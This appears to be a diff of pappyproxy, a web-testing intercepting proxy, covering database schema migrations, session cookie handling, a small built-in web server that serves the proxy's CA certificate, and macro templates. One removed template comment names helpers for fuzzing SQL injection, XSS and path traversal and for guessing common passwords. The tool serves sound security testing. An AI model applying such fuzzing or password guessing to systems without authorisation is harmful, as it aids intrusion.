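#   @defer.inlineCallbacks
#   def upgrade(dbpool, schemas):
#       rows = yield dbpool.runQuery("SELECT version FROM schema_meta;")
#       current = rows[0][0]
#       for version, module in sorted(schemas.items()):
#           if version > current:
#               yield module.update(dbpool)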


@@ -1,55 +0,0 @@
from pappyproxy import http
from twisted.internet import defer
"""
Schema v2
Description:
Adds support for storing the port of a request and whether it used SSL. This
lets requests that have the port/ssl settings specified in the CONNECT request
maintain that information.
"""
update_queries = [
"""
ALTER TABLE requests ADD COLUMN port INTEGER;
""",
"""
ALTER TABLE requests ADD COLUMN is_ssl INTEGER;
""",
]
@defer.inlineCallbacks
def update(dbpool):
for query in update_queries:
yield dbpool.runQuery(query)
# Update metadata for each request
reqrows = yield dbpool.runQuery(
"""
SELECT id, full_request
FROM requests;
""",
)
# Create an object and get its port/is_ssl
for reqrow in reqrows:
reqid = reqrow[0]
fullreq = reqrow[1]
r = http.Request(fullreq)
port = r.port
is_ssl = r.is_ssl
yield dbpool.runQuery(
"""
UPDATE requests SET port=?,is_ssl=? WHERE id=?;
""",
(port, is_ssl, reqid)
)
yield dbpool.runQuery(
"""
UPDATE schema_meta SET version=2;
"""
)


@@ -1,34 +0,0 @@
from pappyproxy import http
from twisted.internet import defer
"""
Schema v3
Description:
Adds tables to store tags associated with requests
"""
update_queries = [
"""
CREATE TABLE tags (
id INTEGER PRIMARY KEY AUTOINCREMENT,
tag TEXT NOT NULL
);
""",
"""
CREATE TABLE tagged (
reqid INTEGER REFERENCES requests(id),
tagid INTEGER REFERENCES tags(id)
);
""",
"""
UPDATE schema_meta SET version=3;
""",
]
@defer.inlineCallbacks
def update(dbpool):
for query in update_queries:
yield dbpool.runQuery(query)


@@ -1,50 +0,0 @@
from pappyproxy import http
from twisted.internet import defer
"""
Schema v4
Description:
Adds additional metadata to the database for requests. Mainly it stores the host
that a request was sent to so that pappy doesn't have to guess from the host
header.
"""
update_queries = [
"""
ALTER TABLE requests ADD COLUMN host TEXT;
""",
]
@defer.inlineCallbacks
def update(dbpool):
for query in update_queries:
yield dbpool.runQuery(query)
# Update metadata for each request
reqrows = yield dbpool.runQuery(
"""
SELECT id, full_request
FROM requests;
""",
)
# Create an object that will parse the host from the request
for reqrow in reqrows:
reqid = reqrow[0]
fullreq = reqrow[1]
r = http.Request(fullreq)
host = r.host
if r.host:
yield dbpool.runQuery(
"""
UPDATE requests SET host=? WHERE id=?;
""",
(host, reqid)
)
yield dbpool.runQuery(
"""
UPDATE schema_meta SET version=4;
"""
)

View file

@ -1,29 +0,0 @@
from pappyproxy import http
from twisted.internet import defer
"""
Schema v5
Description:
Adds a column to the requests table which will store a dict that plugins can
use to store metadata about requests.
"""
update_queries = [
"""
ALTER TABLE requests ADD COLUMN plugin_data TEXT;
""",
"""
UPDATE requests SET plugin_data='{}';
""",
"""
UPDATE schema_meta SET version=5;
"""
]
@defer.inlineCallbacks
def update(dbpool):
for query in update_queries:
yield dbpool.runQuery(query)

View file

@ -1,87 +0,0 @@
import time
import datetime
from pappyproxy import http
from twisted.internet import defer
"""
Schema v6
Description:
Replaces the string representation of times with unix times so that we can select
by most recent first. Also deletes old tag column.
"""
update_queries = [
"""
CREATE TABLE requests_new (
id INTEGER PRIMARY KEY AUTOINCREMENT,
full_request BLOB NOT NULL,
submitted INTEGER NOT NULL,
response_id INTEGER REFERENCES responses(id),
unmangled_id INTEGER REFERENCES requests(id),
port INTEGER,
is_ssl INTEGER,
host TEXT,
plugin_data TEXT,
start_datetime REAL,
end_datetime REAL
);
""",
"""
INSERT INTO requests_new (id, full_request, submitted, response_id, unmangled_id, port, is_ssl, host, plugin_data) SELECT id, full_request, submitted, response_id, unmangled_id, port, is_ssl, host, plugin_data FROM requests;
""",
]
drop_queries = [
"""
DROP TABLE requests;
""",
"""
ALTER TABLE requests_new RENAME TO requests;
"""
]
@defer.inlineCallbacks
def update(dbpool):
for query in update_queries:
yield dbpool.runQuery(query)
reqrows = yield dbpool.runQuery(
"""
SELECT id, start_datetime, end_datetime
FROM requests;
""",
)
new_times = []
for row in reqrows:
reqid = row[0]
if row[1]:
start_datetime = datetime.datetime.strptime(row[1], "%Y-%m-%dT%H:%M:%S.%f")
start_unix_time = time.mktime(start_datetime.timetuple())
else:
start_unix_time = None
if row[2]:
end_datetime = datetime.datetime.strptime(row[2], "%Y-%m-%dT%H:%M:%S.%f")
end_unix_time = time.mktime(end_datetime.timetuple())
else:
end_unix_time = None
new_times.append((reqid, start_unix_time, end_unix_time))
for reqid, start_unix_time, end_unix_time in new_times:
yield dbpool.runQuery(
"""
UPDATE requests_new SET start_datetime=?, end_datetime=? WHERE id=?;
""", (start_unix_time, end_unix_time, reqid)
)
for query in drop_queries:
yield dbpool.runQuery(query)
yield dbpool.runQuery(
"""
UPDATE schema_meta SET version=6;
"""
)
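# --- Illustrative note (not part of the original file) ---
# The conversion above turns the old ISO-style strings into floats, e.g.:
#   dt = datetime.datetime.strptime('2015-11-20T21:11:39.000000',
#                                   '%Y-%m-%dT%H:%M:%S.%f')
#   time.mktime(dt.timetuple())  # -> a unix timestamp (local-timezone based)
# which is what makes ordering requests by start_datetime meaningful.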

View file

@ -1,23 +0,0 @@
from twisted.internet import defer
"""
Schema v7
Creates an index for requests on start time in the data file. This will make
iterating through history a bit faster.
"""
update_queries = [
"""
CREATE INDEX ind_start_time ON requests(start_datetime);
""",
"""
UPDATE schema_meta SET version=7;
"""
]
@defer.inlineCallbacks
def update(dbpool):
for query in update_queries:
yield dbpool.runQuery(query)
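# --- Illustrative note (not part of the original file) ---
# With ind_start_time in place, ordered history queries such as
#   SELECT id FROM requests ORDER BY start_datetime DESC LIMIT 25;
# can walk the index instead of sorting the whole table, which is where the
# speedup for iterating through history comes from.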

View file

@ -1,39 +0,0 @@
from twisted.internet import defer
"""
Schema v8
Creates a table for saved contexts and for web socket messages. Saved contexts
are saved as a json list of filter strings.
"""
update_queries = [
"""
CREATE TABLE saved_contexts (
id INTEGER PRIMARY KEY AUTOINCREMENT,
context_name TEXT UNIQUE,
filter_strings TEXT
);
""",
"""
CREATE TABLE websocket_messages (
id INTEGER PRIMARY KEY AUTOINCREMENT,
parent_request INTEGER REFERENCES requests(id),
unmangled_id INTEGER REFERENCES websocket_messages(id),
is_binary INTEGER,
direction INTEGER,
time_sent REAL,
contents BLOB
);
""",
"""
UPDATE schema_meta SET version=8;
"""
]
@defer.inlineCallbacks
def update(dbpool):
for query in update_queries:
yield dbpool.runQuery(query)
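# --- Illustrative note (not part of the original file) ---
# filter_strings holds a JSON-encoded list, so a saved context row might look
# something like (assuming pappy's filter-string syntax):
#   ('myscope', '["host ct example.com", "verb eq POST"]')
# which gets decoded with json.loads and applied one filter at a time.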

View file

@ -1,99 +0,0 @@
import os
import glob
import imp
import random
from twisted.internet import reactor
from twisted.enterprise import adbapi
from twisted.internet import defer
@defer.inlineCallbacks
def get_schema_version(dbpool):
schema_exists = yield dbpool.runQuery("SELECT name FROM sqlite_master WHERE type='table' AND name='schema_meta';")
if not schema_exists:
# If we get an empty list, we have no schema
defer.returnValue(0)
else:
schema_version_result = yield dbpool.runQuery("SELECT version FROM schema_meta;")
# There should only be one row in the meta table
assert(len(schema_version_result) == 1)
# Return the retrieved version
version = schema_version_result[0][0]
defer.returnValue(version)
def add_schema_files(schemas):
# Finds and imports all schema_*.py files into the list
module_files = glob.glob(os.path.dirname(os.path.abspath(__file__)) + "/schema_*.py")
for mod in module_files:
module_name = os.path.basename(os.path.splitext(mod)[0])
newmod = imp.load_source('%s'%module_name, mod)
schemas.append( (module_name, newmod) )
def copy_file(a, b):
a_bytes = a.read(1024)
while a_bytes:
b.write(a_bytes)
a_bytes = a.read(1024)
def create_backup(filename):
backup = filename + '.bak'
while os.path.isfile(backup):
backup = '%s.%d' % (backup, random.randint(0, 9999999999))
# Make sure backup file has secure permissions
with os.fdopen(os.open(backup, os.O_CREAT, 0o0600), 'r') as f:
pass
# Copy the datafile
with open(filename, 'rb') as a:
with open(backup, 'wb') as b:
copy_file(a, b)
return backup
@defer.inlineCallbacks
def update_schema(dbpool, filename):
# Update the database schema to the latest version
schema_version = yield get_schema_version(dbpool)
if schema_version == 0:
verbose_update = False
else:
verbose_update = True
schemas = []
add_schema_files(schemas)
schemas = sorted(schemas, key=lambda tup: tup[0])
to_run = range(schema_version, len(schemas))
if len(to_run) > 0:
# Back up data file
if verbose_update:
print 'Backing up data file'
backup = create_backup(filename)
if verbose_update:
print 'Backed up to %s' % backup
try:
for i in to_run:
# schemas[0] is v1, schemas[1] is v2, etc
if verbose_update:
print "Updating datafaile schema to version %d" % (i+1)
yield schemas[i][1].update(dbpool)
# Delete backup
os.remove(backup)
if verbose_update:
print 'Update successful! Deleted backup'
except Exception as e:
# restore the backup
print 'Update failed, restoring backup'
with open(filename, 'wb') as a:
with open(backup, 'rb') as b:
copy_file(b, a)
os.remove(backup)
raise e
@defer.inlineCallbacks
def main():
dbpool = adbapi.ConnectionPool("sqlite3", "data.db", check_same_thread=False)
yield update_schema(dbpool, "data.db")
reactor.stop()
if __name__ == '__main__':
reactor.callWhenRunning(main)
reactor.run()

View file

@ -1,180 +0,0 @@
from .http import ResponseCookie
class Session(object):
"""
A class used to maintain a session over multiple requests. Can remember cookies
and apply a specific header to requests. It is also possible to give the session
a list of cookie names and it will only save those cookies.
"""
def __init__(self, cookie_names=None, header_names=None,
cookie_vals=None, header_vals=None):
"""
Session(self, cookie_names=None, header_names=None, cookie_vals=None, header_vals=None)
Constructor
:param cookie_names: A whitelist for cookies that should be saved from :func:`~pappyproxy.session.Session.save_req` and :func:`~pappyproxy.session.Session.save_rsp` in the session. If no values are given, all cookies will be saved.
:param header_names: A whitelist for headers that should be saved from :func:`~pappyproxy.session.Session.save_req` in the session. If no values are given, no headers will be saved.
:param cookie_vals: A dictionary of cookies to populate the session with. The key should be the cookie name, and the value can be either a string or a :class:`~pappyproxy.http.ResponseCookie`. If a :class:`~pappyproxy.http.ResponseCookie` is given, its flags will be used in :func:`~pappyproxy.session.Session.apply_rsp`.
:param header_vals: A dictionary of header values to populate the session with. The key should be the header name and the value should be a string which should be the header value.
"""
self.cookies = cookie_names or []
self.headers = header_names or []
self.cookie_vals = cookie_vals or {}
self.header_vals = header_vals or {}
if cookie_vals:
for k, v in cookie_vals.iteritems():
if k not in self.cookies:
self.cookies.append(k)
if header_vals:
for k, v in header_vals.iteritems():
if k not in self.headers:
self.headers.append(k)
def _cookie_obj(self, k, v):
"""
Returns the value as a cookie object regardless of whether the stored value is a string or a ResponseCookie.
"""
if isinstance(v, ResponseCookie):
return v
else:
cookie_str = '%s=%s' % (k, v)
return ResponseCookie(cookie_str)
def _cookie_val(self, v):
"""
Returns the value of the cookie regardless of whether the value is a string or a ResponseCookie
"""
if isinstance(v, ResponseCookie):
return v.val
else:
return v
def apply_req(self, req):
"""
apply_req(request)
Apply saved headers and cookies to the request
"""
for k, v in self.cookie_vals.iteritems():
req.cookies[k] = self._cookie_val(v)
for k, v in self.header_vals.iteritems():
req.headers[k] = v
def apply_rsp(self, rsp):
"""
apply_rsp(response)
Will add a Set-Cookie header for each saved cookie. Will not
apply any saved headers. If the cookie was added from a call to
:func:`~pappyproxy.session.Session.save_rsp`, the Set-Cookie flags
will be the same as the original response.
"""
for k, v in self.cookie_vals.iteritems():
val = self._cookie_obj(k, v)
rsp.set_cookie(val)
# Don't apply headers to responses
def save_req(self, req, cookies=None, headers=None):
"""
save_req(req, cookies=None, headers=None)
Updates the state of the session from the given request.
Cookies and headers can be added to their whitelists by passing in a list
for either ``cookies`` or ``headers``.
"""
if cookies:
for c in cookies:
if c not in self.cookies:
self.cookies.append(c)
if headers:
for h in headers:
if h not in self.headers:
self.headers.append(h)
if cookies:
for cookie in cookies:
if cookie in req.cookies:
if cookie not in self.cookies:
self.cookies.append(cookie)
cookie_str = '%s=%s' % (cookie, req.cookies[cookie])
self.cookie_vals[cookie] = ResponseCookie(cookie_str)
else:
for k, v in req.cookies.all_pairs():
if k in self.cookies:
cookie_str = '%s=%s' % (k, v)
self.cookie_vals[k] = ResponseCookie(cookie_str)
if headers:
for header in headers:
if header in self.headers:
self.header_vals[header] = req.headers[header]
def save_rsp(self, rsp, cookies=None, save_all=False):
"""
save_rsp(rsp, cookies=None)
Update the state of the session from the response. Only cookies can be
updated from a response. Additional values can be added to the whitelist
by passing in a list of values for the ``cookies`` parameter. If save_all
is given, all set cookies will be added to the session.
"""
if cookies:
for c in cookies:
if c not in self.cookies:
self.cookies.append(c)
if cookies:
for cookie in cookies:
if cookie in rsp.cookies:
if cookie not in self.cookies:
self.cookies.append(cookie)
self.cookie_vals[cookie] = rsp.cookies[cookie]
else:
for k, v in rsp.cookies.all_pairs():
if save_all:
self.cookie_vals[v.key] = v
if v.key not in self.cookies:
self.cookies.append(v.key)
elif v.key in self.cookies:
self.cookie_vals[v.key] = v
def set_cookie(self, key, val):
"""
set_cookie(key, val)
Set a cookie in the session. ``val`` can be either a string or a :class:`~pappyproxy.http.ResponseCookie`.
If a :class:`~pappyproxy.http.ResponseCookie` is used, make sure its ``key`` value is the same as
the key passed in to the function.
"""
self.cookie_vals[key] = val
def get_cookie(self, key):
"""
get_cookie(key)
Returns the value of the cookie with the given key as a string, even if the value is stored as a :class:`~pappyproxy.http.ResponseCookie`.
If you want to get a :class:`~pappyproxy.http.ResponseCookie`, use :func:`~pappyproxy.session.Session.get_rsp_cookie`.
"""
if key not in self.cookie_vals:
raise KeyError('Cookie is not stored in session.')
v = self.cookie_vals[key]
return self._cookie_val(v)
def get_rsp_cookie(self, key):
"""
get_rsp_cookie(key)
Returns the :class:`~pappyproxy.http.ResponseCookie` associated with the key
regardless of whether the value is stored as a string or a :class:`~pappyproxy.http.ResponseCookie`.
"""
if key not in self.cookie_vals:
raise KeyError('Cookie is not stored in session.')
v = self.cookie_vals[key]
return self._cookie_obj(key, v)
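# --- Illustrative sketch (not part of the original file) ---
# A Session is typically created in a macro and reused across requests, e.g.
# (the request names below are hypothetical):
#   sess = Session(cookie_names=['session_id'],
#                  header_vals={'X-Api-Key': 'abc123'})
#   sess.save_rsp(login_req.response, cookies=['session_id'])  # capture cookie
#   sess.apply_req(next_req)  # replay the cookie and header on a later request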

View file

@ -1,179 +0,0 @@
import os
import mimetypes
from .http import Request, Response
from .util import PappyStringTransport, PappyException
from twisted.test.proto_helpers import StringTransport
from twisted.web.server import Site, NOT_DONE_YET
from twisted.web import static
from twisted.web.resource import Resource, NoResource
from jinja2 import Environment, FileSystemLoader
from twisted.internet import defer
## The web server class
class PappyWebServer(object):
"""
A class that is used to serve pages for requests to http://pappy. It is a
ghetto wrapper around a twisted web Site object. Give it a request object
and it will add a response to it.
NOINDEX
"""
from pappyproxy.pappy import session
site_dir = session.config.pappy_dir+'/site'
loader = FileSystemLoader(site_dir)
env = Environment(loader=loader)
def __init__(self):
root = RootResource(self.site_dir)
self.site = Site(root)
@staticmethod
def render_template(*args, **kwargs):
return PappyWebServer.env.get_template(args[0]).render(*args[1:], **kwargs).encode('utf-8')
@defer.inlineCallbacks
def handle_request(self, req):
protocol = self.site.buildProtocol(None)
tr = PappyStringTransport()
protocol.makeConnection(tr)
protocol.dataReceived(req.full_request)
tr.waitForProducers()
## WORKING HERE
# use loading functions to load response
yield tr.complete_deferred
rsp_raw = tr.value()
rsp = Response(rsp_raw)
req.response = rsp
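# --- Illustrative note (not part of the original file) ---
# handle_request drives the twisted Site without a real socket: the raw request
# bytes are fed to the protocol, and whatever the Site writes back is collected
# from the string transport and re-parsed as a Response. Roughly:
#   protocol.dataReceived('GET / HTTP/1.1\r\nHost: pappy\r\n\r\n')
#   raw_rsp = transport.value()  # bytes the Site "sent" to the browser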
## functions
def blocking_string_request(func):
"""
Wrapper for blocking request handlers in resources. The custom string
transport has a deferred that must be called back when the message is
complete. If the handler is blocking, the message is complete as soon as the
handler returns, so the deferred can be called back right away.
NOINDEX
"""
def f(self, request):
request.transport.complete_deferred.callback(None)
return func(self, request)
return f
## Resources
class PappyResource(Resource):
"""
Helper class for site resources.
NOINDEX
"""
def getChild(self, name, request):
if name == '':
return self
return Resource.getChild(self, name, request)
class RootResource(PappyResource):
def __init__(self, site_dir):
PappyResource.__init__(self)
self.site_dir = site_dir
self.dirListing = False
# Static resource
self.static_resource = NoDirFile(self.site_dir + '/static')
self.putChild('static', self.static_resource)
# Cert download resource
self.putChild('certs', CertResource())
# Response viewing resource
self.putChild('rsp', ResponseResource())
@blocking_string_request
def render_GET(self, request):
return PappyWebServer.render_template('index.html')
class NoDirFile(static.File):
def directoryListing(self):
return NoResource()
@blocking_string_request
def render_GET(self, request):
return static.File.render_GET(self, request)
## Cert resources
class CertResource(PappyResource):
def __init__(self):
PappyResource.__init__(self)
self.putChild('download', CertDownload())
@blocking_string_request
def render_GET(self, request):
return PappyWebServer.render_template('certs.html')
class CertDownload(PappyResource):
@blocking_string_request
def render_GET(self, request):
from .pappy import session
cert_dir = session.config.cert_dir
ssl_ca_file = session.config.ssl_ca_file
with open(os.path.join(cert_dir, ssl_ca_file), 'r') as f:
ca_raw = f.read()
request.responseHeaders.addRawHeader("Content-Type", "application/x-x509-ca-cert")
return ca_raw
## View responses
class ResponseResource(PappyResource):
def getChild(self, name, request):
if name == '':
return self
return ViewResponseResource(name)
@blocking_string_request
def render_GET(self, request):
return PappyWebServer.render_template('viewrsp.html')
class ViewResponseResource(PappyResource):
def __init__(self, reqid):
PappyResource.__init__(self)
self.reqid = reqid
def render_GET(self, request):
d = Request.load_request(self.reqid)
d.addCallback(self._render_response, request)
d.addErrback(self._render_response_err, request)
d.addCallback(lambda _: request.transport.complete_deferred.callback(None))
return NOT_DONE_YET
def _render_response(self, req, tw_request):
if req.response:
if not req.response.body:
raise PappyException("Response has no body")
if 'content-type' in req.response.headers:
tw_request.responseHeaders.addRawHeader("Content-Type", req.response.headers['content-type'])
else:
guess = mimetypes.guess_type(req.url)
if guess[0]:
tw_request.responseHeaders.addRawHeader("Content-Type", guess[0])
tw_request.write(req.response.body)
else:
tw_request.write(PappyWebServer.render_template('norsp.html'))
tw_request.finish()
def _render_response_err(self, err, tw_request):
tw_request.write(PappyWebServer.render_template('norsp.html', errmsg=err.getErrorMessage()))
tw_request.finish()
err.trap(Exception)

View file

@ -1,11 +0,0 @@
<html>
<head>
<title>Pappy</title>
</head>
<body style="background-color: #414141">
<div style="padding: 12pt; width:960px; margin:auto; background-color: #AAA">
<h1>Pappy</h1>
{% block body %}{% endblock %}
</div>
</body>
</html>

View file

@ -1,6 +0,0 @@
{% extends "base.html" %}
{% block body %}
<h2>Cert Download</h2>
Click <a href="/certs/download">here</a> to download the CA cert.
{% endblock %}

View file

@ -1,8 +0,0 @@
{% extends "base.html" %}
{% block body %}
<ul>
<li><a href="/certs">Certs</a></li>
<li>View responses in browser from <a href="http://pappy/rsp">http://pappy/rsp/&lt;reqid&gt;</a></li>
</ul>
{% endblock %}

View file

@ -1,8 +0,0 @@
{% extends "base.html" %}
{% block body %}
<h2>Unable To Return Response Body</h2>
{% if errmsg %}
<p>{{ errmsg }}</p>
{% endif %}
{% endblock %}

Binary file not shown.


View file

@ -1 +0,0 @@
asdfasdfasdf

View file

@ -1,6 +0,0 @@
{% extends "base.html" %}
{% block body %}
<h2>View Response</h2>
<p>View http://pappy/rsp/&lt;id&gt; to view a response in your browser. The body of the response returned to your browser will be the same, but the headers will not.</p>
{% endblock %}

View file

@ -1,200 +0,0 @@
"""
Sorted collection for maintaining a sorted list.
Taken from http://code.activestate.com/recipes/577197-sortedcollection/
"""
from bisect import bisect_left, bisect_right
class SortedCollection(object):
'''Sequence sorted by a key function.
SortedCollection() is much easier to work with than using bisect() directly.
It supports key functions like those used in sorted(), min(), and max().
The result of the key function call is saved so that keys can be searched
efficiently.
Instead of returning an insertion-point which can be hard to interpret, the
five find-methods return a specific item in the sequence. They can scan for
exact matches, the last item less-than-or-equal to a key, or the first item
greater-than-or-equal to a key.
Once found, an item's ordinal position can be located with the index() method.
New items can be added with the insert() and insert_right() methods.
Old items can be deleted with the remove() method.
The usual sequence methods are provided to support indexing, slicing,
length lookup, clearing, copying, forward and reverse iteration, contains
checking, item counts, item removal, and a nice looking repr.
Finding and indexing are O(log n) operations while iteration and insertion
are O(n). The initial sort is O(n log n).
The key function is stored in the 'key' attribute for easy introspection or
so that you can assign a new key function (triggering an automatic re-sort).
In short, the class was designed to handle all of the common use cases for
bisect but with a simpler API and support for key functions.
>>> from pprint import pprint
>>> from operator import itemgetter
>>> s = SortedCollection(key=itemgetter(2))
>>> for record in [
... ('roger', 'young', 30),
... ('angela', 'jones', 28),
... ('bill', 'smith', 22),
... ('david', 'thomas', 32)]:
... s.insert(record)
>>> pprint(list(s)) # show records sorted by age
[('bill', 'smith', 22),
('angela', 'jones', 28),
('roger', 'young', 30),
('david', 'thomas', 32)]
>>> s.find_le(29) # find oldest person aged 29 or younger
('angela', 'jones', 28)
>>> s.find_lt(28) # find oldest person under 28
('bill', 'smith', 22)
>>> s.find_gt(28) # find youngest person over 28
('roger', 'young', 30)
>>> r = s.find_ge(32) # find youngest person aged 32 or older
>>> s.index(r) # get the index of their record
3
>>> s[3] # fetch the record at that index
('david', 'thomas', 32)
>>> s.key = itemgetter(0) # now sort by first name
>>> pprint(list(s))
[('angela', 'jones', 28),
('bill', 'smith', 22),
('david', 'thomas', 32),
('roger', 'young', 30)]
'''
def __init__(self, iterable=(), key=None):
self._given_key = key
key = (lambda x: x) if key is None else key
decorated = sorted((key(item), item) for item in iterable)
self._keys = [k for k, item in decorated]
self._items = [item for k, item in decorated]
self._key = key
def _getkey(self):
return self._key
def _setkey(self, key):
if key is not self._key:
self.__init__(self._items, key=key)
def _delkey(self):
self._setkey(None)
key = property(_getkey, _setkey, _delkey, 'key function')
def clear(self):
self.__init__([], self._key)
def copy(self):
return self.__class__(self, self._key)
def __len__(self):
return len(self._items)
def __getitem__(self, i):
return self._items[i]
def __iter__(self):
return iter(self._items)
def __reversed__(self):
return reversed(self._items)
def __repr__(self):
return '%s(%r, key=%s)' % (
self.__class__.__name__,
self._items,
getattr(self._given_key, '__name__', repr(self._given_key))
)
def __reduce__(self):
return self.__class__, (self._items, self._given_key)
def __contains__(self, item):
k = self._key(item)
i = bisect_left(self._keys, k)
j = bisect_right(self._keys, k)
return item in self._items[i:j]
def index(self, item):
'Find the position of an item. Raise ValueError if not found.'
k = self._key(item)
i = bisect_left(self._keys, k)
j = bisect_right(self._keys, k)
return self._items[i:j].index(item) + i
def count(self, item):
'Return number of occurrences of item'
k = self._key(item)
i = bisect_left(self._keys, k)
j = bisect_right(self._keys, k)
return self._items[i:j].count(item)
def insert(self, item):
'Insert a new item. If equal keys are found, add to the left'
k = self._key(item)
i = bisect_left(self._keys, k)
self._keys.insert(i, k)
self._items.insert(i, item)
def insert_right(self, item):
'Insert a new item. If equal keys are found, add to the right'
k = self._key(item)
i = bisect_right(self._keys, k)
self._keys.insert(i, k)
self._items.insert(i, item)
def remove(self, item):
'Remove first occurrence of item. Raise ValueError if not found'
i = self.index(item)
del self._keys[i]
del self._items[i]
def find(self, k):
'Return first item with a key == k. Raise ValueError if not found.'
i = bisect_left(self._keys, k)
if i != len(self) and self._keys[i] == k:
return self._items[i]
raise ValueError('No item found with key equal to: %r' % (k,))
def find_le(self, k):
'Return last item with a key <= k. Raise ValueError if not found.'
i = bisect_right(self._keys, k)
if i:
return self._items[i-1]
raise ValueError('No item found with key at or below: %r' % (k,))
def find_lt(self, k):
'Return last item with a key < k. Raise ValueError if not found.'
i = bisect_left(self._keys, k)
if i:
return self._items[i-1]
raise ValueError('No item found with key below: %r' % (k,))
def find_ge(self, k):
'Return first item with a key >= k. Raise ValueError if not found'
i = bisect_left(self._keys, k)
if i != len(self):
return self._items[i]
raise ValueError('No item found with key at or above: %r' % (k,))
def find_gt(self, k):
'Return first item with a key > k. Raise ValueError if not found'
i = bisect_right(self._keys, k)
if i != len(self):
return self._items[i]
raise ValueError('No item found with key above: %r' % (k,))

View file

@ -1,17 +0,0 @@
from pappyproxy.session import Session
MACRO_NAME = '{{macro_name}}'
SHORT_NAME = '{{short_name}}'
runargs = []
def init(args):
global runargs
runargs = args
def mangle_request(request):
global runargs
return request
def mangle_response(request):
global runargs
return request.response

View file

@ -0,0 +1,30 @@
{% include 'macroheader.py.tmpl' %}
{% if req_lines %}
###########
## Requests
# It's suggested that you call .copy() on these and then edit attributes
# as needed to create modified requests
##
{% for lines, params in zip(req_lines, req_params) %}
req{{ loop.index }} = parse_request(({% for line in lines %}
{{ line }}{% endfor %}
), {{ params }})
{% endfor %}{% endif %}
runargs = []
def init(client, args):
global runargs
runargs = args
def mangle_request(client, request):
global runargs
return request
def mangle_response(client, request, response):
global runargs
return response
def mangle_websocket(client, request, response, wsmessage):
global runargs
return wsmessage
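# --- Illustrative example (not part of the template) ---
# A filled-in mangle_request body that rewrites a header might look like:
#   def mangle_request(client, request):
#       req = request.copy()
#       req.headers['User-Agent'] = 'pappy'
#       return req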

View file

@ -1,31 +0,0 @@
{% include 'macroheader.py.template' %}
## Iterator cheat sheet:
# fuzz_path_trav() - Values for fuzzing path traversal
# fuzz_sqli() - Values for fuzzing SQLi
# fuzz_xss() - Values for fuzzing XSS
# common_passwords() - Common passwords
# common_usernames() - Common usernames
# fuzz_dirs() - Common web paths (ie /wp-admin)
{% if req_lines %}
###########
## Requests
# It's suggested that you call .copy() on these and then edit attributes
# as needed to create modified requests
##
{% set count = 1 %}{% for params, lines in zip(req_params, req_lines) %}
req{{ count }} = Request(({% for line in lines %}
'{{ line }}'{% endfor %}{% set count = count+1 %}
){{ params }})
{% endfor %}{% endif %}
def run_macro(args):
# Example:
# req = req1.copy() # Copy req1
# req.submit() # Submit the request to get a response
# print req.response.raw_headers # print the response headers
# req.save() # save the request to the data file
# or copy req1 into a loop and use string substitution to automate requests
pass

View file

@ -0,0 +1,22 @@
{% include 'macroheader.py.tmpl' %}
{% if req_lines %}
###########
## Requests
# It's suggested that you call .copy() on these and then edit attributes
# as needed to create modified requests
##
{% for lines, params in zip(req_lines, req_params) %}
req{{ loop.index }} = parse_request(({% for line in lines %}
{{ line }}{% endfor %}
), {{ params }})
{% endfor %}{% endif %}
def run_macro(client, args):
# Example:
"""
req = req1.copy() # Copy req1
client.submit(req) # Submit the request to get a response
print(req.response.full_message()) # print the response
client.save_new(req) # save the request to the data file
"""
pass

View file

@ -1,27 +0,0 @@
from pappyproxy.session import Session
MACRO_NAME = '{{macro_name}}'
SHORT_NAME = '{{short_name}}'
runargs = []
def init(args):
global runargs
runargs = args
def modify_header(msg, key, val):
"""
Modifies the header in a request or a response if it already exists in
the message
"""
if key in msg.headers:
msg.headers[key] = val
def mangle_request(request):
global runargs
modify_header(request, 'headername', 'headerval')
return request
def mangle_response(request):
global runargs
modify_header(request.response, 'headername', 'headerval')
return request.response

View file

@ -1,29 +0,0 @@
import sys
{% include 'macroheader.py.template' %}
from pappyproxy.http import submit_requests
def run_macro(args):
# Get IDs of in-context requests
reqids = main_context_ids()
reqids.reverse() # Resubmit earliest first
# Iterate over each request and submit it
to_submit = []
for rid in reqids:
req = request_by_id(rid).copy()
###################
# Modify `req` here
req.tags.add('resubmit')
to_submit.append(req)
#############################
# Modify resubmit params here
submit_requests(to_submit,
mangle=False,
save=False,
save_in_mem=False,
unique_paths=False,
unique_paths_and_args=False,
)

View file

@ -1,8 +0,0 @@
from pappyproxy.http import Request, get_request, post_request, request_by_id
from pappyproxy.plugin import main_context_ids
from pappyproxy.context import set_tag
from pappyproxy.session import Session
from pappyproxy.iter import *
MACRO_NAME = '{{macro_name}}'
SHORT_NAME = '{{short_name}}'

View file

@ -0,0 +1 @@
from pappyproxy.proxy import parse_request, parse_response

View file

@ -1,211 +0,0 @@
import pytest
import mock
import pappyproxy
from pappyproxy.mangle import async_mangle_request, async_mangle_response
from pappyproxy.http import Request, Response
from testutil import no_tcp, no_database, func_deleted, mock_deferred, mock_deep_save, fake_saving
def retf(r):
return False
@pytest.fixture
def ignore_edit(mocker):
new_edit = mock.MagicMock()
new_edit.return_value = mock_deferred(None)
new_plugin = mock.MagicMock()
new_plugin.return_value = new_edit
mocker.patch('pappyproxy.plugin.plugin_by_name', new=new_plugin)
@pytest.fixture
def ignore_delete(mocker):
new_os_remove = mock.MagicMock()
mocker.patch('os.remove', new=new_os_remove)
return new_os_remove
@pytest.fixture(autouse=True)
def no_logging(mocker):
mocker.patch('pappyproxy.proxy.log')
@pytest.fixture
def req():
r = Request()
r.start_line = 'GET / HTTP/1.1'
r.host = 'www.ffffff.eeeeee'
r.body = 'AAAA'
return r
@pytest.fixture
def req_w_rsp(req):
r = Response()
r.start_line = 'HTTP/1.1 200 OK'
r.headers['Test-Header'] = 'ABC123'
r.body = 'AAAA'
req.response = r
return req
@pytest.fixture
def mock_tempfile(mocker):
new_tfile_obj = mock.MagicMock()
tfile_instance = mock.MagicMock()
new_tfile_obj.return_value.__enter__.return_value = tfile_instance
tfile_instance.name = 'mockTemporaryFile'
mocker.patch('tempfile.NamedTemporaryFile', new=new_tfile_obj)
new_open = mock.MagicMock()
fake_file = mock.MagicMock(spec=file)
new_open.return_value.__enter__.return_value = fake_file
mocker.patch('__builtin__.open', new_open)
return (new_tfile_obj, tfile_instance, new_open, fake_file)
########################
## Test request mangling
@pytest.inlineCallbacks
def test_mangle_request_edit(req, mock_deep_save, mock_tempfile,
ignore_edit, ignore_delete):
tfile_obj, tfile_instance, new_open, fake_file = mock_tempfile
r = req
new_contents = ('GET / HTTP/1.1\r\n'
'Content-Length: 4\r\n\r\n'
'BBBB')
fake_file.read.return_value = new_contents
new_req = yield async_mangle_request(r)
assert not mock_deep_save.called
assert tfile_obj.called
assert tfile_instance.write.called
